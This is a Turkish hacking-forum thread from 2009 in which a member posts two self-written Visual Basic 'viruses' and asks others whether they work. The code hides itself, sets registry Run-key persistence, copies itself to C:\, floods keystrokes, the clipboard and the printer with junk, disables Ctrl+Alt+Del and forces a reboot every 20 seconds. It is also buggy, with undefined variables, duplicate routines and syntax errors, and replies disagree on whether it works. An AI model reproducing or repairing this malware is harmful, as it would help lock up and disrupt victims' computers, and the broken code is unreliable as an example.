İPUCU

Trojan ve Virüsler Trojan ve Virüsler Hakkında Bilgiler.

Seçenekler

Virüs kodları(kendim kodladım)

09-08-2009 21:19
#1
EtnikSentez - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2009
Nereden:
İzmir
Mesajlar:
58
Teşekkür (Etti):
4
Teşekkür (Aldı):
4
Konular:
13
arkadaşlar 2 virüs kodladım bunlar benim kodladığım ilk virüsler ustalarım bakıp çalışıp çalışmadığını söylerlerse sevinirim.inşallah çalışıyorlardır

1. virüs ne kopyalarsa kopyalasın hacked yazıyor yazıcısı varsa sürekli hacked çıktısı alıyor ve kalvyaden ne girilirse girilsin hacked yazıyor böylelikle internete filan giremiyor(hacked yazısı klavyeden bir yazı gelmesini beklemez)

Kod:
Private Sub Form_Load()
Timer1.Enabled = True
Timer1.Interval = 500
App.TaskVisible = False
On Error Resume Next
Me.Hide
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDOWS\CUR RENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
End Sub

Private Sub Timer1_Timer()
Dim asia1, asia2, asia3, 
asia1 = Rnd * 100
asia2 = App.Path & "\" & App.EXEName & ".exe"
asia3 = asia1 & ".exe"
FileCopy yol, "c:\" & asia3 & ""
End Sub

Private Sub Form_Load()
Timer1.Interval = 100
End Sub

Private Sub Timer1_Timer()
SendKeys "EnCryPtion", 1
End Sub
Private Sub Form_Load()
Printer.Print "EnCryPtion"
End Sub
Private Sub Timer1_Timer()
Clipboard.Clear
Clipboard.SetText "EnCryPtion"
End Sub


2. virüs bu benim daha çok hoşuma gidiyor bilgisayara 20 saniyede bir reset atıyor böylelikle silinemiyor tabii bunun bir yolunu bulursa(programı kapatırsa da kendini tekrar açıyor ve iş garanti olsun diyectrl+alt+del tuşlarını kapatması için koduda ekledim)buyrun kod


Kod:
Private Sub Form_Load()
Timer1.Enabled = True
Timer1.Interval = 500
App.TaskVisible = False
On Error Resume Next
Me.Hide
Dim KayitDefteri As Object
Set KayitDefteri = CreateObject("wscript.shell")
KayitDefteri.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\MICROSOFT\WINDIWS\CURRENTVERSION\RUN\" & App.EXEName, App.Path & "\" & App.EXEName & ".exe"
End Sub
Private Sub Form_Terminate()
Shell App.Path + "/" + App.EXEName + ".exe"
End Sub
Private Sub Timer1_Timer()
Dim tr1, tr2, tr3
tr1 = Rnd * 100
tr2 = App.Path & "\" App.EXEName & ".exe"
tr3 = asia1 & ".exe"
FileCopy yol, "c:\" & tr3 & ""
End Sub
Private Declare Function SystemParametersInfo Lib _ 
"user32" Alias "SystemParametersInfoA" (ByVal uAction _
As Long, ByVal uParam As Long, ByVal lpvParam As Any, _
ByVal fuWinIni As Long) As Long

Sub CtrlAltDeleteKapat(Kapali As Boolean)
Dim X As Long
X = SystemParametersInfo(97, Kapali, CStr(1), 0)
End Sub

Dim Kayit
Shell "shutdown -r -t 20", vbHide

her 2 virüsde kendini windows dosyalarına kopyalıyor ve kendini gizliyor hata olduğunda ise hatanın olduğu koddan itibaren çalışmaya devam ediyorum.
ustalarım ilk denemem başarılı olmuşmu yorumlarınızı bekliyorum

10-08-2009 10:14
#2
legeskont1 - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
08/2009
Mesajlar:
3
Teşekkür (Etti):
0
Teşekkür (Aldı):
0
Konular:
0
Teşekkürler Dostum Bu virüsleri not defterine .batolarakmı kaydedeceğiz acaba ?
10-08-2009 11:41
#3
EtnikSentez - ait Kullanıcı Resmi (Avatar)
Forumdan Uzaklaştırıldı
Üyelik tarihi:
07/2009
Nereden:
İzmir
Mesajlar:
58
Teşekkür (Etti):
4
Teşekkür (Aldı):
4
Konular:
13
evet de ben çalışıp çalışmadığını bilmiyorumbirilerinin pclerindede denemek istemiyorum sadece yazabilecek miyim onu denedim
19-08-2009 22:47
#4
evillord - ait Kullanıcı Resmi (Avatar)
Üye
Üyelik tarihi:
07/2009
Nereden:
Kod aklın di
Mesajlar:
1.576
Teşekkür (Etti):
165
Teşekkür (Aldı):
1077
Konular:
171
birncisi calsyr stantart bat wirüsü anti yakalıyor 2.calsmıyr
Kullanıcı İmzası

Bizi eskiler tanır, yeniler örnek alır...

Bookmarks


« Önceki Konu | Sonraki Konu »
Seçenekler

Yetkileriniz
Sizin Yeni Konu Acma Yetkiniz var yok
You may not post replies
Sizin eklenti yükleme yetkiniz yok
You may not edit your posts

BB code is Açık
Smileler Açık
[IMG] Kodları Açık
HTML-Kodları Kapalı
Trackbacks are Kapalı
Pingbacks are Kapalı
Refbacks are Kapalı